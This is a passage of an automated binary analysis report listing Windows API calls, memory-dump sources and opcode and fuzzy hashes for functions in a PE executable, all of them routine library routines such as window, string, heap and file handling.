                                        • Part of subcall function 0044A868: GetViewportExtEx.GDI32(?,?,?,?,?,?,?,00000000,00000000), ref: 0044A886
                                        • Part of subcall function 0044A868: MulDiv.KERNEL32(?,00000000,00000000), ref: 0044A8AB
                                        • Part of subcall function 0044A868: MulDiv.KERNEL32(00000002,00000000,00000000), ref: 0044A8C6
                                      • MulDiv.KERNEL32(?,000009EC,00000060), ref: 0044BD68
                                      • MulDiv.KERNEL32(00000002,000009EC,?), ref: 0044BD73
                                      Similarity
                                      • API ID: CapsDevice$ModeViewportWindow
                                      • String ID:
                                      • API String ID: 2598972148-0
                                      • Opcode ID: 03f19f7b51fd1e37733d963cf7d8ac10634022bc776e7559f60925ad547ee638
                                      • Instruction ID: 3b3ddf1760b2ef514a17aac1a64369faae310b8f0b3a0117a8fd4d40ac32d530
                                      • Instruction Fuzzy Hash: 4C11C271600604EFE7116F16CC44E1EBBA9EF88751B11446AE98597371CB75EC428F94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetMapMode.GDI32(?,00000000,?,?,?,?,0042F48D,?,?,?,?,?,?,00000000,00000000), ref: 0044BD8F
                                      • GetDeviceCaps.GDI32(?,00000058), ref: 0044BDC9
                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 0044BDD2
                                        • Part of subcall function 0044A7FF: GetWindowExtEx.GDI32(?,0042F48D,00000000,?,?,?,0042F48D,?,?,?,?,?,?,00000000,00000000), ref: 0044A810
                                        • Part of subcall function 0044A7FF: GetViewportExtEx.GDI32(?,?,?,0042F48D,?,?,?,?,?,?,00000000,00000000), ref: 0044A81D
                                        • Part of subcall function 0044A7FF: MulDiv.KERNEL32(0042F48D,00000000,00000000), ref: 0044A842
                                        • Part of subcall function 0044A7FF: MulDiv.KERNEL32(46892C46,00000000,00000000), ref: 0044A85D
                                      • MulDiv.KERNEL32(0042F48D,00000060,000009EC), ref: 0044BDF6
                                      • MulDiv.KERNEL32(46892C46,?,000009EC), ref: 0044BE01
                                      Similarity
                                      • API ID: CapsDevice$ModeViewportWindow
                                      • String ID:
                                      • API String ID: 2598972148-0
                                      • Opcode ID: 212e9706f997d4c6b5321b5725502b7d42eeb663ef1b0b42501b037c2dbc1ba0
                                      • Instruction ID: 574601f981b23d2e8aacdb28edd01b740e87dbfbfe38d9c73454c85138a4b51a
                                      • Instruction Fuzzy Hash: BF110275600600EFEB219F19CC44D1EBBA9EF88710B11482AF98197371CB31EC418B94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrlenA.KERNEL32(?), ref: 0043498E
                                      • SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 00434996
                                      • lstrlenA.KERNEL32(?), ref: 0043499E
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001), ref: 004349C4
                                      • SysAllocString.OLEAUT32 ref: 004349CB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: AllocByteStringlstrlen$CharMultiWide
                                      • String ID:
                                      • API String ID: 1909028937-0
                                      • Opcode ID: 9d16d9926812b6db788e4967131d4df17530516c089d28d4b58ed3abdf3f4726
                                      • Instruction ID: a46f0177f23d0a8f6f826f2c993b119930ec1d11279d5ad8964c46c23d84eeb9
                                      • Opcode Fuzzy Hash: 9d16d9926812b6db788e4967131d4df17530516c089d28d4b58ed3abdf3f4726
                                      • Instruction Fuzzy Hash: 2401F772500214BBD7105BA2DC04BABB7ACEF4A366F008123FD00D6261D774DD10CBE9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetLastError.KERNEL32(?,00000000,0043B066,00000000,?,?,?,004368C5,?,?,00000000,00000000), ref: 004385D5
                                      • TlsGetValue.KERNEL32(?,00000000,0043B066,00000000,?,?,?,004368C5,?,?,00000000,00000000), ref: 004385E3
                                      • SetLastError.KERNEL32(00000000,?,00000000,0043B066,00000000,?,?,?,004368C5,?,?,00000000,00000000), ref: 0043862F
                                        • Part of subcall function 0043CC20: HeapAlloc.KERNEL32(00000008,?,?,?,?,0043858B,00000001,00000074,?,0043683B), ref: 0043CC75
                                      • TlsSetValue.KERNEL32(00000000,?,00000000,0043B066,00000000,?,?,?,004368C5,?,?,00000000,00000000), ref: 00438607
                                      • GetCurrentThreadId.KERNEL32 ref: 00438618
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: ErrorLastValue$AllocCurrentHeapThread
                                      • String ID:
                                      • API String ID: 2020098873-0
                                      • Opcode ID: fcf45feb30ef176d83f47cbaa537ce4877940fa7b0f49ac5e8278708330959a4
                                      • Instruction ID: d5b39bc7e7ffdfef539aee699344ae7aa9e96877fb2fa71ef9a9a9f54781726a
                                      • Opcode Fuzzy Hash: fcf45feb30ef176d83f47cbaa537ce4877940fa7b0f49ac5e8278708330959a4
                                      • Instruction Fuzzy Hash: 31F0F6365017116BD7302B61EC0A71B7A50EF0D7B2F11167EF541E62B1EF28C80187AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • TlsFree.KERNEL32(00000000,?,?,0044D1D4,00000000,00000001), ref: 0044CCD3
                                      • GlobalHandle.KERNEL32(00741E08), ref: 0044CCFB
                                      • GlobalUnlock.KERNEL32(00000000,?,?,0044D1D4,00000000,00000001), ref: 0044CD04
                                      • GlobalFree.KERNEL32 ref: 0044CD0B
                                      • DeleteCriticalSection.KERNEL32(00471264,?,?,0044D1D4,00000000,00000001), ref: 0044CD15
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Global$Free$CriticalDeleteHandleSectionUnlock
                                      • String ID:
                                      • API String ID: 2159622880-0
                                      • Opcode ID: 3d7bc8cfa3e9fbba55667e20e25ca01bd0eeae1029c5182b69564233bbe51952
                                      • Instruction ID: 1a2d7103c6ccf2c6248e9f3a4988d7e4f1cd0b93f2cc9ed28b72bac8d6bdab5f
                                      • Opcode Fuzzy Hash: 3d7bc8cfa3e9fbba55667e20e25ca01bd0eeae1029c5182b69564233bbe51952
                                      • Instruction Fuzzy Hash: D6F0BB352016009BD7105B7CAC88B2B77ADAF8575571D056AF405D3272CB74DC018668
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 00431800
                                      • CoTaskMemFree.OLE32(?,?,00000000), ref: 004319E7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Task$AllocFree
                                      • String ID: $(
                                      • API String ID: 3007142545-55695022
                                      • Opcode ID: 4f541a401770cf01e4c11c3996786a4f1659b198a53bde040e6703a184917f61
                                      • Instruction ID: f20197ec8c77d40593cb984b8be26e07b6dc6deda75bd64006856094a9cadf63
                                      • Opcode Fuzzy Hash: 4f541a401770cf01e4c11c3996786a4f1659b198a53bde040e6703a184917f61
                                      • Instruction Fuzzy Hash: B1B148B0A002099FCB14DFA9C894AAEFBF5FF88304F24455EE056EB261D774A945CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetSysColor.USER32(00000000), ref: 00441331
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Color
                                      • String ID: d-G$d-G
                                      • API String ID: 2811717613-459862128
                                      • Opcode ID: 110366f04300478ba4bb5291405728027e2b7820d422dde37fa4335d02143908
                                      • Instruction ID: 15a21e2f2c78e1649e0665a89a9b12d00473a4ded9b23192b3c1f7affa55b801
                                      • Opcode Fuzzy Hash: 110366f04300478ba4bb5291405728027e2b7820d422dde37fa4335d02143908
                                      • Instruction Fuzzy Hash: 8A41C4765083009FE724DF15E84465BB7E4FBC4714F84493EF98983260D378D989CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GlobalLock.KERNEL32 ref: 00449539
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 0044958C
                                      • GlobalUnlock.KERNEL32(?), ref: 00449623
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Global$ByteCharLockMultiUnlockWide
                                      • String ID: System
                                      • API String ID: 231414890-3470857405
                                      • Opcode ID: a85947741f6bd03062891b0e1b79d4d7644b8f0d33fafd257d99d8d3042ec707
                                      • Instruction ID: 604e5efbd8bba617ec4ceac61edfe7040de23fe45b777964414c3ba1df942715
                                      • Opcode Fuzzy Hash: a85947741f6bd03062891b0e1b79d4d7644b8f0d33fafd257d99d8d3042ec707
                                      • Instruction Fuzzy Hash: 9A41C572800205FFDB11DF94C8819AF7BB4FF04354F24C16AE815AB255D7349E46DB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetClassNameA.USER32(?,?,00000010), ref: 00441BC1
                                      • lstrcmpA.KERNEL32(Button,?), ref: 00441BDA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: ClassNamelstrcmp
                                      • String ID: Button
                                      • API String ID: 3770760073-1034594571
                                      • Opcode ID: 6fb1238a6c0f8c8f731b0a6fec269b85fa975d4365148c330b7492b8b68e1e13
                                      • Instruction ID: 885c6621b04a9bea72ddfdcc43ab977dc6bc654b8cc468f0311ee07937fa006d
                                      • Opcode Fuzzy Hash: 6fb1238a6c0f8c8f731b0a6fec269b85fa975d4365148c330b7492b8b68e1e13
                                      • Instruction Fuzzy Hash: BB21F9766002181FF710AB58EC85DFB335CEA85366F84097BFD15C2231F62BE55982AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetMenuCheckMarkDimensions.USER32 ref: 0044C041
                                      • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0044C0F0
                                      • LoadBitmapA.USER32 ref: 0044C108
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
                                      • String ID:
                                      • API String ID: 2596413745-3916222277
                                      • Opcode ID: 99f9c37ed659e03d958843df24a736969a8c67dab7c2c1fa28bccac15947d29c
                                      • Instruction ID: 042a87b8abca8814ce77c1eec56ed6c1f46f85acefc00441d45da69311356965
                                      • Opcode Fuzzy Hash: 99f9c37ed659e03d958843df24a736969a8c67dab7c2c1fa28bccac15947d29c
                                      • Instruction Fuzzy Hash: 51212572E00215EFEB10CBB8DC85BAE7BB8EB44701F0545A6E905EB2D2D7749A448B94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentDirectoryA.KERNEL32(00000104,?,?), ref: 0043E7DC
                                        • Part of subcall function 0043E840: GetDriveTypeA.KERNEL32(?,?,0043E782,?,?), ref: 0043E85F
                                      • GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 0043E7C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: CurrentDirectoryDriveFullNamePathType
                                      • String ID: .$:
                                      • API String ID: 3995704478-4202072812
                                      • Opcode ID: 0b4f02c8fb91d5c12c47bc976b6d0318bfb2293ccf827d128ac51334d529a334
                                      • Instruction ID: 96f66a06455795a8d7e8fe4d707ddfbcba76b526f76ec80e4462f38d11eaf525
                                      • Opcode Fuzzy Hash: 0b4f02c8fb91d5c12c47bc976b6d0318bfb2293ccf827d128ac51334d529a334
                                      • Instruction Fuzzy Hash: 9D21A8712092459FEB15EF66D881BDE37A8AF08304F10649BF655DB2C1DB78E980C62D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetWindowLongA.USER32 ref: 0044ACBD
                                      • GetClassNameA.USER32(00000000,?,0000000A), ref: 0044ACD8
                                      • lstrcmpiA.KERNEL32(?,combobox), ref: 0044ACE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: ClassLongNameWindowlstrcmpi
                                      • String ID: combobox
                                      • API String ID: 2054663530-2240613097
                                      • Opcode ID: 855d9a187ad83f61b53a2fd792def37e03ef9ecdf610848a0810b06748a9b197
                                      • Instruction ID: a4b06bf249304631700a785cc4aef3e2afeefb96581d6df7a967ac7ec71e46fe
                                      • Opcode Fuzzy Hash: 855d9a187ad83f61b53a2fd792def37e03ef9ecdf610848a0810b06748a9b197
                                      • Instruction Fuzzy Hash: 27E0E531594208BBDF009F60DC89F9E3768A701302F108532B823D61E1D634D555C65A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleA.KERNEL32(KERNEL32,00435228), ref: 00438B08
                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00438B18
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                      • API String ID: 1646373207-3105848591
                                      • Opcode ID: b9aae6056e8e5ffd4b77bea46f9d9235fddcdb262ccc5e972e76fe677a27723e
                                      • Instruction ID: 7b84e06858efe0736819d8acebd0796357ac23fa3cfc35eb7d0c083feac4e047
                                      • Opcode Fuzzy Hash: b9aae6056e8e5ffd4b77bea46f9d9235fddcdb262ccc5e972e76fe677a27723e
                                      • Instruction Fuzzy Hash: F9C08CA038030277DB202BB00C09FA7A12C9B4DB03F2C60AB7205D00F0EE5CC800E02E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualFree.KERNEL32(?,00008000,00004000,00000000,?,?), ref: 00439308
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00439363
                                      • HeapFree.KERNEL32(00000000,?), ref: 00439375
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Free$Virtual$Heap
                                      • String ID: ;hC
                                      • API String ID: 2016334554-2509120230
                                      • Opcode ID: 476b62d165d1789a68cccf685f7be7706af3c580fd76392f2971441884d7051f
                                      • Instruction ID: 24126ea347c4c96d0f07a69f9be3c5a353fc25f896a305f78bf40c09cfa22ff5
                                      • Opcode Fuzzy Hash: 476b62d165d1789a68cccf685f7be7706af3c580fd76392f2971441884d7051f
                                      • Instruction Fuzzy Hash: 9BB172355002059FDB18CF44D990A69BBB2FF88324F25C2AED80A5B396C775ED82CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 0044EA03
                                        • Part of subcall function 0044E754: VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 0044E81F
                                        • Part of subcall function 0044E754: SysFreeString.OLEAUT32(00000000), ref: 0044E84C
                                      • VariantClear.OLEAUT32(0000000C), ref: 0044EB40
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                       • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                       • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                       • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                       • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Variant$ChangeClearFreeStringTypelstrlen
                                      • String ID:
                                      • API String ID: 36103042-0
                                      • Opcode ID: ea6ba70824c02515fb7e6071f306181cc43f5f5b1be2feada4ac61410175e345
                                      • Instruction ID: fc50199ab1f7a27eb6457bc09dfac7fc23ebdc11acc75d07790cdb9a51b7374c
                                      • Opcode Fuzzy Hash: ea6ba70824c02515fb7e6071f306181cc43f5f5b1be2feada4ac61410175e345
                                      • Instruction Fuzzy Hash: 1D71C83190020AEBEF10DF96D885AAFBBB0FF04350F14855AF8059B252D738ED45DB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000100,00000000,00000000), ref: 0043A1E5
                                      • GetLastError.KERNEL32 ref: 0043A1EF
                                      • ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 0043A2B5
                                      • GetLastError.KERNEL32 ref: 0043A2BF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: ErrorFileLastRead
                                      • String ID:
                                      • API String ID: 1948546556-0
                                      • Opcode ID: 1e1b84975f26cc51d4158bfd38237042a3ce6184264c28f2b29890be7ec3f51c
                                      • Instruction ID: 9f043cc73bbe67966edcb2dacdcbed3d37758d59ac63692d0a32518417bc34af
                                      • Opcode Fuzzy Hash: 1e1b84975f26cc51d4158bfd38237042a3ce6184264c28f2b29890be7ec3f51c
                                      • Instruction Fuzzy Hash: C351E8745483849FDF218F98C8847AE7BB0BF1A304F14549BE8E18B391D3799962CB1B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • IsWindowVisible.USER32 ref: 004314F2
                                      • GetDesktopWindow.USER32 ref: 00431505
                                      • GetWindowRect.USER32 ref: 00431518
                                      • GetWindowRect.USER32 ref: 00431525
                                        • Part of subcall function 0044706C: MoveWindow.USER32(?,?,?,00000000,?,?,?,00431666,?,?,?,?,00000000), ref: 00447088
                                        • Part of subcall function 004470FC: ShowWindow.USER32(?,M!@,0044850B,00000000,0000E146,00000000,?,?,0040214D), ref: 0044710A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Window$Rect$DesktopMoveShowVisible
                                      • String ID:
                                      • API String ID: 3835705305-0
                                      • Opcode ID: 7dda426fe8538b4a0594c820dd061b566554bef50830a9c833efc187c30709c6
                                      • Instruction ID: aaa5cddaafe54c94b0b4062213d65f9161940805706fea7222b74cbc75b1cee8
                                      • Opcode Fuzzy Hash: 7dda426fe8538b4a0594c820dd061b566554bef50830a9c833efc187c30709c6
                                      • Instruction Fuzzy Hash: 16510771A0020AEFDB00DFE8C995DAEB7B9EF48304B24445AF606E7260DB35AD05CB65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,?,18E8F04D), ref: 0043AB4A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 8b67528b897beed40f26bdaa44c730f858f027e4b27ea0faac0772919ca74776
